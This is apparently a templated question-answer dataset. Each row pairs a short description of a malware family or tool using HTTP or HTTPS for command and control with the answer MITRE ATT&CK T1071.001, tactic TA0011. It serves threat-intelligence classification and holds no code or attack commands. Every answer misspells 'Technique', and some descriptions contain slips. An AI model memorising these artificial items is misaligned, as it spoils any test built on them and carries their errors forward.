+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BackConfig has the ability to use HTTPS for C2 communiations.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BadPatch uses HTTP for C2.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bankshot uses HTTP for command and control communication.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bazar can use HTTP and HTTPS over ports 80 and 443 in C2 communications.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bisonal has used HTTP for C2 communications.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BlackEnergy communicates with its C2 server over HTTP.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BlackMould can send commands to C2 in the body of HTTP POST requests.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BoomBox has used HTTP POST requests for C2.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Brute Ratel C4 can use HTTPS and HTTPS for C2 communication.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bundlore uses HTTP requests for C2.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Various implementations of CHOPSTICK communicate with C2 over HTTP.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: COATHANGER uses an HTTP GET request to initialize a follow-on TLS tunnel for command and control.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CORESHELL can communicate over HTTP for C2.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CSPY Downloader can use GET requests to download additional payloads from C2.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The Carbanak malware communicates to its command server using HTTP with an encrypted payload.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Carberp has connected to C2 servers via HTTP.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Carbon can use HTTP in C2 communications.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cardinal RAT is downloaded using HTTP over port 443.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ChChes communicates to its C2 server over HTTP and embeds data within the Cookie HTTP header.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Chaes has used HTTP for C2 communications.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CharmPower can use HTTP to communicate with C2.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: China Chopper's server component executes code sent via HTTP POST commands.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Clambling has the ability to communicate over HTTP.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: One variant of CloudDuke uses HTTP and HTTPS for C2.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cobalt Strike can use a custom command and control protocol that can be encapsulated in HTTP or HTTPS. All protocols use their standard assigned ports.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ComRAT has used HTTP requests for command and control.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Comnie uses HTTP for C2 communication.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CosmicDuke can use HTTP or HTTPS for command and control to hard-coded C2 servers.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CozyCar's main method of communicating with its C2 servers is using HTTP or HTTPS.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CreepyDrive can use HTTPS for C2 using the Microsoft Graph API.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CreepySnail can use HTTP for C2.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Crimson can use a HTTP GET request to download its final payload.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Crutch has conducted C2 communications with a Dropbox account using the HTTP API.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cyclops Blink can download files via HTTP and HTTPS.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DEATHRANSOM can use HTTPS to download files.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DRATzarus can use HTTP or HTTPS for C2 communications.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dacls can use HTTPS in C2 communications.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DanBot can use HTTP in C2 communication.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkComet can use HTTP for C2 communications.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkTortilla has used HTTP and HTTPS for C2.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkWatchman uses HTTPS for command and control.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Daserf uses HTTP for C2.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DealersChoice uses HTTP for communication with the C2 server.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Diavol has used HTTP GET and POST requests for C2.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dipsind uses HTTP for C2.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Doki has communicated with C2 over HTTPS.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Donut can use HTTP to download previously staged shellcode payloads.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DownPaper communicates to its C2 server over HTTP.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dridex has used POST requests and HTTPS for C2 communications.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Drovorub can use the WebSocket protocol and has initiated communication with C2 servers with an HTTP Upgrade request.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DustySky has used both HTTP and HTTPS for C2.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dyre uses HTTPS for C2 communications.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ELMER uses HTTP for command and control.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Egregor has communicated with its C2 servers via HTTPS protocol.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Elise communicates over HTTP or HTTPS for C2.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Emissary uses HTTP or HTTPS for C2.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Emotet has used HTTP for command and control.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Empire can conduct command and control over protocols like HTTP and HTTPS.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Epic uses HTTP and HTTPS for C2 communications.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: EvilBunny has executed C2 commands directly via HTTP.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Exaramel for Linux uses HTTPS for C2 communications.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Explosive has used HTTP for communication.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FELIXROOT uses HTTP and HTTPS to communicate with the C2 server.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FRAMESTING can retrieve C2 commands from values stored in the `DSID` cookie from the current HTTP request or from decompressed zlib data within the request's `POST` data.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FatDuke can be controlled via a custom C2 protocol over HTTP.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Felismus uses HTTP for C2.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Final1stspy uses HTTP for C2.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Flagpro can communicate with its C2 using HTTP.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FlawedAmmyy has used HTTP for C2.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FoggyWeb has the ability to communicate with C2 servers over HTTP GET/POST requests.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Gazer communicates with its C2 servers over HTTP.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Gelsemium can use HTTP/S in C2 communications.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GeminiDuke uses HTTP and HTTPS for command and control.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Get2 has the ability to use HTTP to send information collected from an infected host to C2.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Gold Dragon uses HTTP for communication to the control servers.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GoldFinder has used HTTP for C2.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GoldMax has used HTTPS and HTTP GET requests with custom HTTP cookies for C2.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GoldenSpy has used the Ryeol HTTP Client to facilitate HTTP internet communication.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Goopy has the ability to communicate with its C2 over HTTP.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Grandoreiro has the ability to use HTTP in C2 communications.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GravityRAT uses HTTP for C2.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GreyEnergy uses HTTP and HTTPS for C2 communications.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GrimAgent has the ability to use HTTP for C2 communications.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GuLoader can use HTTP to retrieve additional binaries.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The ""Uploader"" variant of HAMMERTOSS visits a hard-coded server over HTTP/S to download the images HAMMERTOSS uses to receive commands.","Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HAWKBALL has used HTTP to communicate with a single hard-coded C2 server.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HTTPBrowser has used HTTP and HTTPS for command and control.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Helminth can use HTTP for C2.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Hi-Zor communicates with its C2 server over HTTPS.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Hikit has used HTTP for C2.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HyperBro has used HTTPS for C2 communications.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: IceApple can use HTTP GET to request and pull information from C2.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: IcedID has used HTTPS in communications with C2.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Industroyer’s main backdoor connected to a remote C2 server using HTTPS.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: InvisiMole uses HTTP for C2 communications.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ixeshe uses HTTP for command and control.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: JHUHUGIT variants have communicated with C2 servers over HTTP and HTTPS.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KEYPLUG has the ability to communicate over HTTP and WebSocket Protocol (WSS) for C2.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KGH_SPY can send data to C2 with HTTP POST requests.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KONNI has used HTTP POST for C2.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KOPILUWAK has used HTTP POST requests to send data to C2.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kazuar uses HTTP and HTTPS to communicate with the C2 server. Kazuar can also act as a webserver and listen for inbound HTTP requests through an exposed API.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Variants of Kevin can communicate with C2 over HTTP.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Keydnap uses HTTPS for command and control.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kinsing has communicated with C2 over HTTP.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Koadic has used HTTP for C2 communications.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The Komplex C2 channel uses HTTP POST requests.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LIGHTWIRE can use HTTP for C2 communications.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LOWBALL command and control occurs via HTTPS over port 443.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LiteDuke can use HTTP GET requests in C2 communications.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LitePower can use HTTP and HTTPS for C2 communications.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lokibot has used HTTP for C2 communications.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LookBack’s C2 proxy tool sends data to a C2 server over HTTP.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MCMD can use HTTPS in communication with C2 web servers.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MacSpy uses HTTP for command and control.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Machete uses HTTP for Command & Control.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mafalda can use HTTP for C2.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MarkiRAT can initiate communication over HTTP/HTTPS for its C2 server.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Maze has communicated to hard-coded IP addresses via HTTP.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MechaFlounder has the ability to use HTTP in communication with C2.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Metamorfo has used HTTP for C2.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Micropsia uses HTTP and HTTPS for C2 network communications.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Milan can use HTTPS for communication with C2.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MiniDuke uses HTTP and HTTPS for command and control.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mis-Type network traffic can communicate over HTTP.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mongall can use HTTP for C2 communication.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: More_eggs uses HTTPS for C2.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mori can communicate using HTTP over IPv4 or IPv6 depending on a flag set.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mythic supports HTTP-based C2 profiles.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NETEAGLE will attempt to detect if the infected host is configured to a proxy. If so, NETEAGLE will send beacons via an HTTP POST request. NETEAGLE will also use HTTP to download resources that contain an IP address and Port Number pair to connect to for further C2.","Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NETWIRE has the ability to communicate over HTTP.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NGLite will initially beacon out to the NKN network via an HTTP POST over TCP 30003.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NOKKI has used HTTP for C2 communications.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Neoichor can use HTTP for C2 communications.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ninja can use HTTP for C2 communications.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OLDBAIT can use HTTP for C2.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OSX_OCEANLOTUS.D can also use use HTTP POST and GET requests to send and receive C2 information.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Octopus has used HTTP GET and POST requests for C2 communications.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Okrum uses HTTP for communication with its C2.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OnionDuke uses HTTP and HTTPS for C2.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OopsIE uses HTTP for C2 communications.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Out1 can use HTTP and HTTPS in communications with remote hosts.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OutSteel has used HTTP for C2 communications.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OwaAuth uses incoming HTTP requests with a username keyword and commands and handles them as instructions to perform actions.,"Tecnique: T1071.001 Application Layer Protocol: Web Protocols, Tactic: TA0011 Command and Control"
